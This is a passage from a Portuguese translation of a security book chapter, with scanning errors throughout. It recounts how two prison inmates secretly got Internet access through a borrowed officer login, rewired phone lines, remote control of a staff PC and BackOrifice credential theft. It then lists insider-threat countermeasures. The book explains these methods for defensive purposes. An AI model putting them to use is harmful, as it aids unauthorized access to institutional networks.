Mas ele estava correndo um grandę risco* E se o capitao voltasse inesperadamente e o flagrasse ouvindo 
musica, jogando na tela ou vendo um filme de mulher pelada? Isso significaria adeus a 
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posięao privilegiada na cozinha, a moleza das tarefas no escritório e ao acesso ao computador que de tinha 
montado com tanto sacrificio. 

Enąuanto isso, Danny tinha seus próprios desafios, Agora estava trabalhando no escritório da Agricultura, 
cercado por computadores, com tomadas de telefone por toda parte ligando-o ao mundo extemo, Ele parecia um 
garoto com o nariz grudado na vitrine da confeitaria e sem dinheiro no bolso. Todas aąuelas tentaęoes tao perto, 
e ele sem ter como aproveita-las. 

Ehn dia, um oficial apareceu no minusculo escritório de Danny- "Ele trouxe sua maąuina porąue nao 
conseguia conecta-la a Internet. Eu realmente nao sabia como funcionava um modem, nao havia ninguem para 
me ensinar nada. Mas consegui ajuda-lo a efetuar a conexao." Enąuanto fazia isso, Danny pediu o nome do 
usuario e a senha do oficial; provavelmente nao viu nenhum problema nisso, ja que os detentos nao tinham 
permissao para usar computador com acesso on-line. 

Danny percebeu o que seria complicado demais para o guarda entender, ou o que seria tecnicamente dificil de 
imaginar: o guarda lhe dera urna passagem eletrónica para a Internet. Danny, que tinha urna linha telefónica 
secreta atras de armarios em sua area de trabalho, conectou-a a płaca de modem de seu computador. Com o login 
e a senha do oficial memorizada, o acesso a Internet estava a sua disposięao. 

On-line em seguranęa 

Para Danny, ter acesso a Internet abriu-lhe um novo mundo em seu monitor. Mas, assim como William, ele 
corria enorme risco toda vez que alguem tambem ficava on-line. 

Eu era capaz de entrar, pegar informaęoes sobre computadores e tudo, e fazer perguntas. Estava a 

servięo do oficial, mas o tempo todo tinha medo de que isso fosse descoberto. Tentava ser cuidadoso 

para nao ficar on-line tanto tempo, para nao deixar as linhas ocupadas. 

Urna maneira inteligente de contomar o problema surgiu. Danny instalou um splitter* na linha de telefone que 
a ligava a maąuina de fax. Mas nao demorou muito para a unidade Ag comeęar a ouvir reclamaęoes de que outras 
prisóes ąueriam saber por que a linha de fax deles ficava ocupada a maior parte do tempo. Danny percebeu que 
ele precisaria de urna linha só para isso se ąuisesse navegar pela rede a vontade e com seguranęa. Urna rapida 
pesąuisa fomeceu a resposta: ele desco-briu dois pontos de telefone ligados, mas que nao estavam sendo usados. 
Aparentemente, nenhum funcionario se lembrava da existencia deles. Ele religou o fio de seu modem a urna das 
tomadas de telefone, Agora tinha a própria linha extema. Outro problema resolvido. 

Em um canto de sua sala minuscula, sob urna pilha de caixas, ele montou um computador que funcionaria 
como um servidor — na verdade, um dispositivo de armazenamento eletrónico para todas as coisas geniais das 
ąuais ąueria fazer download, de modo que os arquivos de musica e as instruęoes de hacking de computador e 
todo o resto poderiam ser encontradas em seu computador, caso alguem olhasse. 

* Dispositivo colocado na entrada da linha telefónica que separa a poręao do sinal relativa a transmissao de dados 

(N.da R.T). 
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As coisas estavam tomando forma, mas Danny estava enfrentando outra dificuldade bem maior Nao tinha 
como saber o que aconteceria se ele e o oficial tentassem usar a conta da Internet ao mesmo tempo. Se 
Danny ja estivesse conectado, o oficial receberia urna mensagem de erro dizendo que nao tinha sido possivel 
acessar a linha porque a conta dele ja estava sendo usada? O homem podia ser urn idiota, mas certamente 
naquele momento ele se lembraria de ter dado a Danny suas informaęóes para se conectar e comeęaria a 
pensar no assunto. Na epoca, Danny nao conseguia encontrar urna soluęao, e o problema o consumia. 

Mesmo assim, estava orgulhoso do que tinha conseguido, dadas as circunstancias. Aquilo havia exigido 
urn trabalho imenso. "Eu tinha construido urn alicerce sólido — com os servidores funcionando, podia fazer 
download de qualquer coisa que pudesse tirar da rede, por em funcionamento o [software] GetRight*,que 
manteria urn download funcionando durante 24 horas. Jogos, videos, informaęao de hacking, aprender como 
as redes sao montadas, vulnerabilidades, como encontrar portas abertas." 

William entendeu como o piano de Danny no departamento de Agricultura tinha sido possivel. "Ele era 
basicamente o administrador de rede porque o cara do mundo livre (o funcionario civil) para quem eles 
estavam trabalhando la era urn palhaęo." Os detentos recebiam atribuięóes que o funcionario deveria estar 
apto a fazer, mas nao sabia coisas como 'a programaęao C++ e Visual Basic', nem eles tinham a inteligencja 
necessaria para administrar adequadamente a rede. 

Outro desafio tambem preocupava Danny: seu computador estava colocado de tal maneira que dava para 
urn corredor; entao, qualquer pessoa podia ver o que ele estava fazendo, Como o escritório da Agricultura era 
trancado após o expediente, ele só podia ficar on-line durante o dia, esperando momentos em que todos do 
escritório parecessem estar ocupados demais com o próprio trabalho para se interessar pelo que ele estava 
fazendo. Descobrindo urn truque inteligente que Ihe permitiria ter controle de outro computador, ele conectou 
sua maquina aquela usada por urn funcionario civil que trabalhava no lado oposto ao dele. Ouando o homem 
nao estava la e parecia que ninguem entraria pelas portas do fundo por urn tempo, Danny controlava o outro 
computador, colocava-o on-line e dava comandos para fazer download de jogos ou musicas que ele queria 
para o servidor no canto. 

Urn dia, quando Danny estava fazendo conexao para efetuar urn download, alguem apareceu 
inesperadamente na area de trabalho dele: urna guarda feminina — sempre muito mais intrometida e apegada 
as regras que os homens, na opiniao de Danny e William. Antes que ele pudesse cortar o controle com a outra 
maquina, a guarda arregalou os olhos: ela tinha notado o cursor se movendo! Danny conseguiu encerrar sua 
operaęao. A policial piscou, provavelmente pensou ter imaginado aquilo, e saiu, 

Soluęao 

William ainda se lembra bem do dia em que Danny encontrou a soluęao para os problemas de acesso a 
Internet. O pessoal da cozinha tinha permissao para fazer suas refeięóes na sala de jantar 

* Software que permite que se possa continuar baixando urn arquivo do ponto de onde foi interrompido 

(N.da R. T.). 

ft 
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depois que os oficiais terminassem e saissem, William freąuentemente conseguia levar Danny para fazer uma 
"refeięao muito melhor" na sala de jantar com ele, e eles tambem podiam conversar em particular. "Ainda me 
lembro do dia em que o levei ate la", William relatou. "Ele disse: 'Eu sei como podemos fazer isso, B', Era assim 
que eles me chamavam — B ou Big B. E com isso ele me explicou o que iriamos fazer." 

O que Danny tinha em mente era juntar duas peęas de um quebra-cabeęa: as linhas de telefone que ligavam 
ao mundo extemo, disponiveis no Departamento de Agricultura, e os computadores de William na cozinha. Ele 
pensou em uma maneira que permitisse que os dois usassem os computadores e entrassem na Internet sempre que 
quisessem, com liberdade e seguranęa. 

Sempre nos sentayamos no fundo do armazem de abastecimento para jogar nos computadores. E 

eu pensava: "Se podemos nos sentar aqui e Jogar e ninguem liga — os guardas nao ligam, contanto 

que faęamos nosso trabalho —, entao por que nao podemos ter acesso a Internet daqui mesmo?" 

O escritório da Agricultura tinha equipamentos de computador mais atualizados porque, como Danny 
explicou, outros presidios do estado eram razzed a seu senddor. O termo razzed era uma maneira de dizer que os 
computadores de outras prisoes estavam se conectando por discagem ao servidor do escritório da Agricultura, o 
qual era configurado para permitir conexoes dial-up pelo RAS da Microsoft (Remote Access Services). 

Um elemento-chave para o sucesso ou o fracasso dos garotos eram os modems. "Obter modems era muito 
importante", disse William. "Eles mantinham um controle estrito deles. Mas conseguimos pór as maos em 
alguns." Quando eles estavam prontos para entrar on-line do armazem de abastecimento, "o que fariamos era 
discar as linhas de telefone intemas da unidade e razz no Departamento de Agricultura". 

Traduęao: do armazem de abastecimento eles entrariam com um comando para o modem de computador 
discar um telefone numa linha de telefone interna. O chamado seria recebido por um modem na oficina da 
fazenda, que estaria conectado ao servidor de Danny. Aquele senddor estava numa rede local para todos os outros 
computadores do escritório, alguns dos quais tinham modems conectados a linhas extemas de telefone, Com as 
redes de computador do armazem de abastecimento e do escritório da Ag conversando entre si pela linha interna 
de telefone, o próximo comando iria instruir um daqueles computadores do escritório da Ag a discar para a 
Internet. Voiła! Acesso instantaneo. 

Bom, nao era bem assim. Os dois hackers ainda precisavam de uma conta com um provedor da internet. 
Inicialmente, eles usaram os nomes de login e senhas do pessoal que trabalhava no departamento "quando 
sabiamos que eles estariam fora da cidade, caęando ou algo assim", diz Danny. Essa informaęao foi reunida por 
meio de um software instalado nos outros computadores, o BackOrifice, uma conhecida ferramenta que monitora 
a distancia e fomece o controle de um computador remoto como se eles estivessem sentados na frente dele. 

E claro que usar as senhas dos outros era arriscado — alem de todos os outros riscos que eles estavam 
correndo. Foi William, dessa vez, que chegou a uma soluęao. "Fiz meus pais pagarem para termos acesso a 
Internet por meio de uma empresa local de servięos." Desse modo, ja nao era mais necessario usar informaęoes de 
outras pessoas para acessar o seryięo. 
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Eles acabaram mantendo conexao permanente com a Internet por meio do escritório de Agricultora. 
"Tinhamos dois servidores FTP funcionando la, fazendo download de filmes e musica, e mais ferramentas de 
hacking e todos os tipos de coisas como essa", diz Danny. "Eu estava conseguindo jogos que nem tinham sido 
lanęados ainda." 

Quase pego 

Em sua sede no armazem de abastecimento, William conectou cartoes de som e speakers extemos para que 
eles pudessem pór musica ou ouvir urna trilha sonora enquanto assistiam a um filme que estava sendo transferido 
por download. Se um guarda perguntasse o que estavam fazendo, William diria: "Eu nao faęo perguntas sobre o 
que voces fazem, entao, tambem nao me faęam perguntas , 

Eu dizia aos guardas o tempo todo que ha algumas coisas na vida que posso prometer. 

Numero um: eu nao arranjarei uma pistola e nao vou atirar em ninguem aqui. 

Numero dois: eu nao vou usar drogas e ficar com a mente fraca. Numero tres: nao 
vou arranjar um cafetao e nao vou me tornar um cafetao. Numero quatro: nao vou 
mexer com uma oficial feminina. 

Mas nao podia prometer a eles que nao iria brigar. Nunca menti para eles. E eles 
respeitayam minha honestidade e minha sinceridade, e ai faziam as coisas para 
mim. Voce pode conseguir favores dos guardas conversando com eles. 

O dialogo rege a naęao. Voce conversa com mulheres e as convence a tirar as calęas, 
ve o que eu estou falando, voce conversa com os homens e os convence a fazer o que 
voce quer. 

Mas nao importa o nivel de conversa inteligente de um presidiario, nenhum guarda vai permitir que ele tenha 
livre acesso a computadores e a linhas de telefone extemas. Logo, como esses dois conseguiam se aventurar como 
hackers na cara dos guardas? William explicou: 

Podiamos fazer muitas dessas coisas porque eles olhavam para nós como se fóssemos imbecis. 
Estavamos no lugar dos incapazes. Entao os chefes [guardas] nao tinham ideia do que estayamos 
fazendo. Eles nao podiam nem imaginar o que eramos capazes de fazer. 

Outra razao e que esses dois detentos estavam fazendo trabalho de computador que os outros eram pagos para 
executar. "A maioria das pessoas que eles tinham la deveria conhecer coisas como computadores 11 , diz William, 
"mas acontece que eles nao eram capazes, entao colocavam os detentos para fazer isso", 

Neste livro sao contadas muitas histórias que revelam o caos e os danos que os hackers podem causar, mas 
William e Danny nao cederam a ma conduta criminal. Eles só queriam aumentar o conhecimento em informatica 
e se distrair, o que, nas circunstancias em que se encontravam, nao e tao dificil de entender. E importante para 
William que as pessoas entendam isso. 


5 # 
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Nós nunca abusamos disso nem prejudicamos ninguem, Nunca. Do meu ponto de vista, achava 
necessario aprender o que queria aprender para que pudesse progredir e ter sucesso quando fosse 
solto. 

Embora os oficiais do presidio do Texas nao soubessem o que escava acontecendo, eles tinham a sorte de 
William e Danny serem bem-intencionados. Imagine a confusao que os dois poderiam ter causado: teria sido 
brincadeira de crianęa para esses caras bolar um esquema para tirar dinheiro ou bens de vitimas inocentes. A 
Internet tinha se tornado sua universidade e seu parque de diversoes. Aprender a fazer falcatruas ou a violar sites 
corporativos teria sido muito facil; os adolescentes e pre-adolescentes aprendem isso todo dia em sites de hackers 
e de outros lugares da Web. E, como prisioneiros, Danny e William tinham todo o tempo do mundo. 

Talvez se possa tirar urna lięao dessa historia toda: dois assassinos condenados podem nao ser imorais nem 
vigaristas ate o osso. Eles eram trapaceiros que navegavam na Internet ilegalmente, mas nao estavam dispostos a 
atacar vitimas inocentes ou empresas sem seguranęa. 

Por um triz 

Os dois hackers novatos nao deixaram, no entanto, a agradavel distraęao da Internet retardar sua 
aprendizagem. "Consegui os livros que queria com minha familia", diz William, que achava que suas aventuras 
eram um modo de treinamento pratico de que ele tanto precisava. "Eu queria entender o fimcionamento intricado 
de urna rede TCP/IP. Precisava daquele tipo de conhecimento para quando fosse solto." 

Foi uma aprendizagem, mas foi divertido tambem, sabe? Foi divertido porque sou uma 
personalidade tipo A — gosto de viver no limite. E foi uma maneira de empinar o nariz para 'os 
homens'. Porque eles nao tinham nem ideia. 

Alem do lado sirio e da diversao que eles tiveram na Internet, Danny e William tambem melhoraram um 
pouco sua Sociabilidade. Eles fizeram amizades pela Internet com algumas mulheres, conhecendo-as em salas de 
chat on-line e comunicando-se por e-mail. Para algumas admitiram que estavam na prisao; para a maioria, 
deixaram de mencionar o fato. Isso nao e de surpreender. 

Viver no limite pode ser empolgante, mas sempre envolve um risco muito grandę. William e Danny nunca 
podiam afrouxar a vigilancia. 

"Uma vez quase fomos pegos", lembra William. "Por um dos oficiais de quem nao gostavamos, porque ele 
era um verdadeiro paranóico. Nao gostavamos de ficar on-line enquanto ele trabalhava." 

Esse guarda um dia ligou para o armazem de abastecimento e percebeu que a linha estava sempre ocupada- 
"O que o deixou furioso foi que um dos rapazes que trabalhavam na cozinha estava comeęando um 
relacionamento com uma enfermeira da clinica da prisao." O guarda suspeitou que o prisioneiro, George, 
estivesse usando a linha para fazer ligaęoes proibidas para sua noiva. Na realidade, a linha de telefone permanecia 
ocupada porque William estava usando a Internet. O guarda correu para o armazem de abastecimento. "Podiamos 
ouvir a chave no portao, entao sabiamos que alguem estava chegando. Desligamos tudo." 
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Quando o guarda chegou, William estava digitando uns relatórios no computador, enąuanto Danny o 
acompanhava, tranąuilamente. O guarda ąueria saber por que a linha telefónica tinha ficado ocupada por 
tanto tempo. William estava preparado para a situaęao e contou urna longa historia, disse que precisou 
fazer urna ligaęao para obter informaęoes sobre o relatório em que estava 
trabalhando. 

Nao podiamos usar uma Unha externa, e ele sabia disso, mas esse guarda era 
superparanóico. Achou que de algum modo tmhamos ajudado George a ligar para a noiva. 

Independentemente de ter acreditado ou nao na historia de William, sem provas o guarda nao podia 
fazer nada. Depois, George casou-se com a enfermeira; pelo que William sabe, ele continua no presidio e 
ainda esta feliz no casamento. 

Crescendo 

Como um jovem como William, um garoto que tinha uma familia bem estruturada e pais afetuosos, 
que o apoiavam, vai parar na prisao? "Minha infancia foi excelente, cara- Eu era um aluno que tirava C, 
mas muito inteligente. Nunca joguei futebol americano e toda aquela coisa, mas nunca me envolvi em 
encrenca ate sair para cursar a faculdade," 

Ser criado como batista nao foi uma experiencia positiva para William, Hoje, ele acha que a religiao 
pode afetar a auto-estima de um jovem, "Voce sabe como e, ensinam que voce nao vale nada desde o 
inicio." Ele atribui suas mas escolhas, em parte, ao fato de ter se convencido de que nao seria bem- 
sucedido. "Bom, eu tinha de conseguir respeito próprio e auto-estima de alguma maneira, e consegui de 
pessoas que tinham medo de mim." 

Estudante de filosofia, William entendia o que Friedrich Nietzsche queria dizer com 'metamorfose do 
espirito': 

Nao sei se voce ja leu Nietzsche, mas ele falou do camelo, do leao e da crianęa. E eu era 
realmente um camelo — fazia o que achava que deixaria as pessoas felizes para ser 
yalorizado por quem gostasse de mim, em vez de gostar de mim mesmo e me sustentar por 
meus próprios meritos. 


Apesar disso, William passou pelo ensino medio de maneira irrepreensivel. Os problemas comeęaram 
depois de ter se matriculado numa faculdade em Houston, e entao se transferiu para uma escola em 
Louisiana para estudar aviaęao. Agradar aos outros transformou-se em necessidade de respeito. 

Eu via que podia ganhar dinheiro vendendo Ecstasy e drogas. As pessoas tinham medo de 
mim porque eu estava sempre armado e sempre arrumava briga, e, sabe como e, levava a 
yida como um idiota. Entao me envolvi numa negociaęao com drogas que deu errado. 


Si 
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Ele e seu cliente acabaram lutando pelo poder. O amigo do outro cara apareceu. Eram dois contra um, 
e William sabia que ele tinha de fazer alguma coisa ou nao sairia vivo. Sacou a arma e disparou. E o 
homem caiu morto. 

De que modo um menino criado no seio de urna familia estavel, solida, enfrenta essa dura realidade? 
Como ele contou fatos tao terriveis? 

Uma das coisas mais duras em minha vida foi contar a minha mae que eu fiz aquilo. Sim, foi 
muito dificil. 

William teve muito tempo para pensar no assunto enquanto ficou na prisao. Ele nao culpava ninguem, 
só a si mesmo. "Voce sabe, foram as escolhas que fiz porque minha auto-estima estava arrasada. E nao 
foi nada que meus pais fizeram, porque eles me criaram da forma que acharam que deviam." 

Para Danny, tudo deu errado numa unica noite. 

Eu era um garoto tonto. Na noite em que completei 18 anos, eles fizeram uma grandę festa 
para mim. A caminho de casa, algumas meninas sentiram necessidade de usar o banheiro- 
Entao, parei na frente de um restaurante. 

Quando elas sairam, dois caras estayam seguindo e incomodando as meninas. Saimos do 
carro e rolou uma briga feia. Antes de tudo terminar, fui para cima de um deles. E entao 
entrei em panico e fui embora. Sai de cena. 

O que aconteceu foi a sindrome de Richard Nixon/Martha Stewart no trabalho: falta de disposięao 
para se apresentar e assumir a responsabilidade por suas aęoes. Se Dan nao tivesse abandonado o local, a 
acusaęao muito provavelmente teria sido de homicidio culposo. Abandonar o local agravou o erro e, 
quando ele foi seguido e preso, era tarde demais para alguem acreditar que aquilo podia ter sido acidental. 

De volta ao mundo 

William tinha cumprido um quarto de sua pena de trinta anos, mas nao estava se saindo bem em suas 
visitas anuais ao Conselho de Liberdade Condicional. O talento dele para tomar a iniciativa veio a tona. 
Ele comeęou a escrever cartas ao Conselho, uma carta a cada duas semanas, com cópias endereęadas a 
cada um dos tres membros do conselho. As cartas detalhavam como ele estava assumindo uma atitude 
construtiva; "Que cursos eu estava fazendo, as notas que tirava, os livros de computaęao que estava lendo, 
e assim por diante", mostrando a eles que "nao sou tao frivolo e nao estou perdendo meu tempo*. 

Ele diz: "Um dos membros disse a minha mae: 'Recebi mais correspondencia dele que de meus seis 
filhos juntos'". Funcionou: ele continuou mandando cartas durante quase um ano, e da vez seguinte em 
que se apresentou ao conselho, eles autorizaram sua saida. Danny, com uma sentenęa mais curta, foi solto 
aproximadamente na mesma epoca. 

Desde que sairam do presidio, tanto William quanto Danny vivem extremamente determinados a 
permanecer longe de encrencas, trabalhando com atiyidades relacionadas a computador, graęas 
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as habilidades aprendidas durante os anos em que ficaram 'dentro'. Embora os dois tenham feito cursos tecnicos 
de nivel universitario na prisao, ambos acreditam que a experiencia pratica, embora perigosa, permitiu-lhes 
desenvolver as habilidades avanęadas de que agora dependem para viver. 

Danny ganhou 64 horas de credito na faculdade, no presidio, e, embora nao tenha recebido qualquer 
certificado profissional, agora trabalha com aplicativos criticos, altamente potentes, inclusive Access e SAP. 

Antes de ser preso, William chegou a concluir o primeiro ano de faculdade e ja cursava o segundo — era 
sustentado pelos pais. Quando saiu, conseguiu retomar os estudos, "Pedi bolsa, consegui e fui estudar. Tirei A 
direto e tambem trabalhei no centro de computaęao da escola." 

Agora ele tern dois diplomas — em artes e em manutenęao de rede de computadores —, ambos pagos com 
credito estudantil. Apesar disso, William nao teve a sorte de Danny de conseguir um emprego na area de 
computaęao. Entao, aceitou o que encontrou, urna colocaęao que envolvia trabalho braęal- Graęas a sua 
determinaęao e a mente aberta de seu empregador, assim que a empresa reconheceu suas qualificaęoes em 
computaęao, ele foi remanejado e assumiu um cargo em que pode aplicar melhor seus conhecimentos tecnicos. E 
um trabalho de computaęao rotineiro dentro de urna empresa, e nao de design de rede, que ele preferiria fazer, 
mas William supre essa necessidade nos fins de semana, imaginando meios baratos de implantar sistemas de 
redes de computador em duas igrejas da area de Houston, como yoluntario. 

Esses dois homens sao exceęoes. Em um dos desafios mais opressores e menos discutidos da sociedade norte- 
americana contemporanea, a maioria dos delinquentes que saem da prisao enfrenta um obstaculo quase 
intransponivel para encontrar trabalho — qualquer trabalho que pague o suficiente para sustentar urna familia. 
Nao e dificil entender isso: quantos empregadores conseguem se sentir seguros em contratar um assassino, um 
ladrao que cometeu assalto a mao armada, um estuprador? Em muitos estados, eles nao podem inscrever-se no 
programa de assistencia social, restando-lhes poucos meios para se sustentar enquanto continuam a busca, quase 
sem esperanęa, de trabalho. Suas opęoes sao severamente limitadas — e entao nao entendemos por que tantos 
voltam com tanta rapidez para a prisao, e supomos que deve ser porque eles nao tern vontade de viver de acordo 
com as regras sociais. 

Hoje, William tern um bom conselho para dar aos jovens e a seus pais: 

Acho que nao existe uma coisa que se possa dizer aos Jovens para faze-los mudar, a nao ser que se 
yalorizem, sabe, e nunca sigam o caminho mais facil, porque o caminho mais longo parece ser 
sempre o mais recompensador no finał. E nunca fique parado porque voce acha que nao tem valor 
suficiente para fazer o que precisa fazer. 

Danny, sem duvida, tambem concorda com as palavras de William: 

Agora eu nao trocaria minha vida por nada neste mundo. Passei a acreditar que posso ganhar a 
vida por meus próprios meritos e sem ter de trilhar o caminho mais facil. Com o passar dos anos, 
aprendi que podia fazer as pessoas me respeitarem pelo meu yalor. E assim que tento viver hoje. 
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Insight 

A historia de William e Danny deixa claro que muitos ataąues relacionados a computador nao podem ser 
evitados apenas controlando-se o que esta mais perto. O vilao pode nao ser um hacker adolescente ou um 
criminoso perito em invadir computadores, mas um insider — um funcionario descontente, um ex-funcionario 
magoado por ter sido demitido recentemente ou, como neste caso, outro tipo de insider, como William e Danny. 

Muitos casos ilustram que os insiders sao, frequentemente, urna ameaęa maior que os atacantes sobre os quais 
lemos nos jomais. Embora a maioria dos controles de seguranęa se concentre em garantir a proteęao contra 
atacantes de fora, e o insider que tern acesso ao equipamento fisico e eletrónico, aos cabos, as cabines telefónicas, 
as estaęoes de trabalho e tomadas em rede intemas. Ele tambem sabe que a organizaęao lida com informaęoes 
delicadas e em que sistemas de computaęao elas estao armazenadas, alem de conseguir suplantar qualquer medida 
para reduzir roubos e fraudes. 

Outro aspecto da historia deles me faz lembrar o filme Um sonho de liberdade. Nele, um prisioneiro 
chamado Andy e contador publico; alguns dos guardas pedem-lhe que prepare o imposto de renda deles, e ele os 
orienta a estruturar suas finanęas da melhor maneira possivel, para reduzir o imposto a ser pago. Andy toma-se 
conhecido por sua competencia entre os funcionarios do presidio e passa a ser contador das altas esferas, ate que 
chega o momento em que pode expor a direęao da penitenciaria, que andou cometendo algumas fraudes. Nao 
apenas num presidio, mas em qualquer outro lugar, todos nos precisamos ser cuidadosos e discretos e saber antes 
a quem passamos informaęoes delicadas. 

No meu caso, o United States Marshal Service criou um alto nivel de paranóia com relaęao as minhas 
competencias. Eles colocaram urna advertencia em meu arquivo, alertando as autoridades do presidio a nao me 
revelar nenhuma informaęao pessoal — nem mesmo me falar o nome delas, urna vez que acreditavam na historia 
de que eu podia entrar em varios bancos de dados secretos do govemo e apagar a identidade de qualquer um, ate 
mesmo de um juiz. Acho que eles assistiram muito ao filme A rede. 

Medidas preventivas 

Entre os mais significativos controles de seguranęa que podem prevenir e detectar efetivamente o abuso do 
insider estao: 

Assumir responsabilidades. Duas praticas comuns suscitam questoes de responsabilidade: o uso de 
documentos compartilhados por varios usuarios e a pratica de trocar informaęoes de contas ou senhas que 
permitam acesso quando um funcionario esta fora do escritório ou ocupado. Ambas criam um ambiente propicio 
para as coisas darem errado. 

E muito simples: trocar informaęoes de contas deveria ser desencorajado, se nao proibido de urna vez. Isso 
implica fazer com que um funcionario use a própria estaęao de trabalho quando forem solicitadas informaęoes 
para se conectar. 

Ambiente-alvo rico. Na maioria das empresas, um atacante que consegue encontrar um meio de ganhar acesso 
de maneira simples a areas de trabalho pode tambem encontrar um meio de entrar facilmente nos sistemas da 
empresa. Poucos funcionarios travam seus computadores quando saem 
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de sua area de trabalho ou usam senhas de screensaver ou start-ups. Só leva alguns segundos para uma pessoa 
com mas intenęoes instalar um stealth para monitorar software numa estaęao de trabalho nao protegida. Em um 
banco, os responsaveis sempre tranęam a gaveta de seu caixa antes de sair. Infelizmente, e raro essa pratica ser 
adotada em outros tipos de instituięao. 

Considere a possibilidade de implementar uma polltica que exija o uso de uma senha de screensaver ou outro 
programa que trave eletronicamente a maquina. Assegure-se de que o departamento de TI faęa com que seja 
cumprida essa polltica por meio de uma gestao da configuraęao. 

Gerenciamento de senha. Minha namorada recentemente foi contratada por uma das cinquenta empresas 
listadas na Fortune que usam um padrao previslvel para atribuir senhas de acesso a Intranet baseado na Web: o 
nome do usuario seguido por um numero aleatório de tres dlgitos. Essa senha e dada quando a pessoa e contratada 
e nunca pode ser mudada pelo funcionario. Isso toma posslvel a qualquer funcionario escrever um simples script 
que possa determinar a senha em nao mais que mil tentativas — uma questao de segundos. 

As senhas de funcionarios, sejam elas estabelecidas pela empresa ou selecionadas por eles próprios, nao 
devem seguir um padrao que as tome facilmente previsiveis. 

Acesso fisico. Funcionarios experientes que conheęam a rede da empresa podem facilmente fazer uso do 
acesso fisico do qual dispoem para comprometer sistemas quando ninguem esta por perto. Quando eu era 
funcionario da GTE, empresa de telecomunicaęoes da Califómia, ter acesso ao edificio era como ter as chaves do 
reino — tudo estava bem aberto. Qualquer um podia ir ate a estaęao de trabalho de um funcionario e ter acesso a 
sistemas delicados. 

Se os funcionarios protegerem adequadamente seus desktops, suas estaęoes de trabalho, seus laptops e PDAs 
usando senhas BIOS seguras e se desconectarem ou travarem seu computador, o insider mal-intencionado 
precisara de mais tempo para atingir seus objetivos. 

Treine funcionarios para se sentirem a vontade para questionar pessoas cuja identidade for duvidosa, 
especialmente em areas delicadas. Use controles de seguranęa fisicos, como cameras e/ou sistemas de acesso 
badge, para monitorar a entrada, a vigilancia e o movimento dentro do predio. Considere fazer uma auditagem 
fisica periódica de entradas e saidas para identificar padroes incomuns de comportamento, sobretudo quando 
acontecer um incidente relacionado a seguranęa. 

Cubiculos 'mortos' e outros pontos de acesso. Quando um funcionario sai da empresa ou e remanejado, 
deixando uma baia vazia, um insider malicioso pode se conectar por tomadas de rede na baia para investigar a 
rede enquanto protege sua identidade. Ou, piór, uma estaęao de trabalho frequentemente fica atras da baia, ligada 
na rede, pronta para qualquer um usar, inclusive o insider mal-intencionado (e tambem qualquer visitante nao 
autorizado que descubra a baia abandonada). 

Outros pontos de acesso em lugares como salas de conferencia tambem oferecem facil acesso ao insider 
propenso a causar danos. 

Considere desativar todas as tomadas de rede que nao sao usadas para evitar acesso anónimo ou nao 
autorizado. Certifique-se de que qualquer sistema de computador em baias vagas esteja protegido contra qualquer 
acesso nao autorizado. 

Pessoal que esteja sendo demitido. Qualquer funcionario que foi demitido mas ainda esta na empresa deve ser 
considerado um risco em potencial- Tais funcionarios deveriam ser monitorados 
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em seus acessos a informaęao confidencial, especialmente em casos de cópias ou downloads de uma ąuantidade 
significativa de dados. Com drives flash USB minusculos, agora imediatamente despe-niveis, que podem ter um 
gigabyte ou mais de dados, transferir grandes ąuantidades de informaęoes delicadas e sair pela porta com elas 
pode ser uma ąuestao de minutos. 

Deve ser uma pratica rotineira restringir o acesso de um funcionario antes mesmo que receba a noticia de 
demissao, rebaixamento ou transferencia indesejavel. Pense tambem em monitorar o uso do computador do 
funcionario para impedir qualquer atividade nao autorizada ou potencialmente prejudicial. 

Instalaęao de hardware nao autorizado. O insider mal-intencionado pode acessar facilmente a baia do 
funcionario e instalar um keystroke logger* de hardware ou software para capturar senhas e outras informaęoes 
confidenciais. Ou, ainda, um drive flash que rouba dados com facilidade. Uma politica de seguranęa que proibe 
qualquer introduęao de dispositivos de hardware sem permissao por escrito, embora se justifique em algumas 
circunstancias, e dificil de policiar; funcionarios bem-intencionados serao incomodados, enquanto os mal- 
intencionado s nao terao incentivo para prestar atenęao a regra. 

Em certas organizaęóes que trabalham com informaęoes extremamente delicadas, remover ou desativar uma 
porta USB em estaęoes de trabalho pode ser um controle necessario* 

Inspeęoes devem ser feitas regularmente, sobretudo para verificar, em particular, se as mas-quinas possuem 
algum dispositivo sem fio que nao tenha sido autorizado, hardware keystroke loggers ou modems atachados. 
Tambem e necessario certificar-se de que nao ha nenhum software que tenha sido instalado recentemente — 
valem apenas os autorizados- O pessoal da seguranęa ou de TI pode verificar pontos de acesso sem fio nas 
imediaęoes usando um PDA que suporte 802.11, ou mesmo um laptop equipado com Microsoft XP e cartao sem 
fio. O Microsoft XP tern uma configuraęao-zero embutida que mostra uma caixa de dialogo quando detecta um 
ponto de acesso sem fio nas imediaęoes. 

Processos de 'tirar vantagem'. A medida que os funcionarios vao aprendendo processos de negócio cmciais na 
organizaęao, vao ficando em boa posięao para identificar qualquer vulnerabilidade nas yerificaęoes e nos balanęos 
usados para detectar fraude ou roubo. Um funcionario desonesto pode roubar ou causar outros prejuizos 
significativos com base em seu conhecimento de como a empresa opera. Os insiders geralmente dispoem de 
acesso irrestrito a escritórios, a arquivos sigilosos, a sistemas de mailing interno e tern conhecimento dos 
procedimentos de negócio no dia-a-dia. 

Pense em analisar processos de negócio delicados e criticos para identificar qualquer vulnerabilidade e 
implementar medidas para combate-las. Em certas situaęóes, separar tarefas requeridas no processo, em que uma 
operaęao delicada desempenhada por determinada pessoa e verificada por outra, pode reduzir o risco de 
seguranęa. 

Politicas de yisitantes. Estabeleęa uma politica de seguranęa para visitantes extemos, inclusive funcionarios 
de escritórios de outras localidades. Um controle efetivo de seguranęa deve exigir que os yisitantes apresentem 
identificaęao emitida pelo estado antes de poderem entrar na instalaęao e 


* Registrador de uso do teclado, programa que rastreia e registra cada tecla digitada e pode erwiar essa informaęao de 
volta ao hacker (N. da R.T.). 
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registrarem as informaęóes num log de seguranęa. Assim, se um incidente de seguranęa acontecer, e possivel 
identificar o causador 

Software de inventario e auditoria. Mantenha um inventario de todos os softwares autorizados instalados ou 
licenciados para cada sistema e faęa uma auditoria periódica desses sistemas. Esse processo de inventario 
nao só assegura o cumprimento legał de normas de licenciamento de software como tambem pode ser usado 
para identificar qualquer instalaęao nao autorizada que poderia afetar negativamente a seguranęa. 

A instalaęao nao autorizada de softwares perigosos, como keystroke loggers, adware ou outros tipos de 
spyware, e dificil de detectar, dependendo de como as pessoas que o desenvolveram esconderam o programa 
dentro do sistema operacional. 

Pense em usar software comercial de terceiros para identificar esses tipos perigosos de programas, como 
os seguintes: 

• Spycop (disponivel em www.spycop.com ) 

• PestPatrol (disponivel em www.pestpatrol.com ) 

